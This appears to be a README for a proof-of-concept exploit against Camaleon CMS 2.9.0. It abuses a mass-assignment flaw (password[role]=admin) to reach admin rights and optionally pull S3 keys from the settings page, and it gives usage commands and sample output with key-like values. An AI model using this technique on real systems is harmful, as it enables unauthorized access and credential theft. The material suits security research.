## https://sploitus.com/exploit?id=4405BB05-5F85-5603-9FA8-63FCEA2E14BD
# Camaleon CMS 2.9.0 – Authenticated Privilege Escalation (Role Change) + Optional S3 Config Leak
> **Target:** Camaleon CMS `v2.9.0`
> **Type:** Authenticated privilege escalation via mass-assignment in `updated_ajax` (role field)
> **Extras:** Optional extraction of S3 configuration from the admin settings page (if the authenticated user can access it after escalation)
## Overview
This repository contains a Python proof-of-concept script that:
1. Logs into the Camaleon CMS admin panel with valid credentials.
2. Fetches a CSRF token from `/admin/profile/edit`.
3. Calls the `updated_ajax` endpoint to update `password[...]` fields **and** abuse `permit!` to set `password[role]=admin`.
4. Optionally (`-e`) extracts S3 configuration values from `/admin/settings/site`.
5. Optionally (`-r`) reverts the role back to its original value after the run.
This behavior matches the insecure mass-assignment pattern described in the related advisory:
- Tenable Research Advisory: TRA-2025-09
## Root Cause (What’s vulnerable)
The controller action below updates a user with `permit!`:
```ruby
def updated_ajax
@user = current_site.users.find(params[:user_id])
update_session = current_user_is?(@user)
@user.update(params.require(:password).permit!)
render inline: @user.errors.full_messages.join(', ')
# keep user logged in when changing their own password
update_auth_token_in_cookie @user.auth_token if update_session && @user.saved_change_to_password_digest?
end
```
Because `permit!` allows **all** keys under `password`, an attacker can send:
- `password[password]`
- `password[password_confirmation]`
- **`password[role]=admin`**
and the application will accept it, upgrading the user’s role.
## Impact
- Any authenticated user who can reach the vulnerable route can potentially escalate privileges by setting their role to `admin`.
- After escalation, admin-only pages (like site settings) may become accessible, potentially leaking sensitive configuration values (e.g., S3 keys).
## Requirements
- Python 3.8+
- `requests`
Install dependency:
```bash
pip install requests
```
## Usage
### Basic privilege escalation (authenticated)
```bash
python exploit.py -u http://alienone.in -U test -P test
```
### Escalate + extract S3 config (`-e`)
```bash
python exploit.py -u http://alienone.in -U test -P test -e
```
### Escalate + revert role back (`-r`)
```bash
python exploit.py -u http://alienone.in -U test -P test -r
```
### Escalate + extract + revert
```bash
python exploit.py -u http://alienone.in -U test -P test -e -r
```
### Arguments
| Flag | Description |
|------|-------------|
| `-u, --url` | Base URL (e.g., `http://alienone.in`) |
| `-U, --username` | Valid username |
| `-P, --password` | Valid password |
| `--newpass` | Password value sent in the update request (default: `test`) |
| `-e, --extract` | Extract S3 config from settings page |
| `-r, --revert` | Revert role back to the original role after escalation |
## Sample Execution
```bash
python3 exploit.py -u http://alienone.in -U test -P test -e -r
```
### Sample Output
```
[+]Camaleon CMS Version 2.9.0 PRIVILEGE ESCALATION (Authenticated)
[+]Login confirmed
User ID: 5
Current User Role: client
[+]Loading PPRIVILEGE ESCALATION
User ID: 5
Updated User Role: admin
[+]Extracting S3 Credentials
s3 access key: AKIAF3A388ECF117D966
s3 secret key: VRRVL5fePgqtow/1Xw65TL9iA2DXtj258BkH33Ux
s3 endpoint: http://localhost:54321
[+]Reverting User Role
User ID: 5
User Role: client
```
---
## How the PoC Confirms Login
The script checks the returned HTML for an `/admin/logout` link after the login POST.
If the logout link is present, the session is considered authenticated.
## Notes on CSRF Tokens
Camaleon uses Rails-style CSRF. You’ll typically see tokens in two common places:
- Hidden input in forms: `name="authenticity_token" value="..."`
- Meta tag: ``
The PoC fetches the **meta csrf-token** from `/admin/profile/edit` and uses it in:
- Request body: `authenticity_token=`
- Header: `X-CSRF-Token: `
## Disclaimer
This code is provided **for authorized security testing and educational purposes only** (e.g., labs, CTFs, and environments where you have explicit permission).
Do not use it against systems you do not own or have permission to test.
---
## References
- Tenable Advisory: TRA-2025-09
https://www.tenable.com/security/research/tra-2025-09
---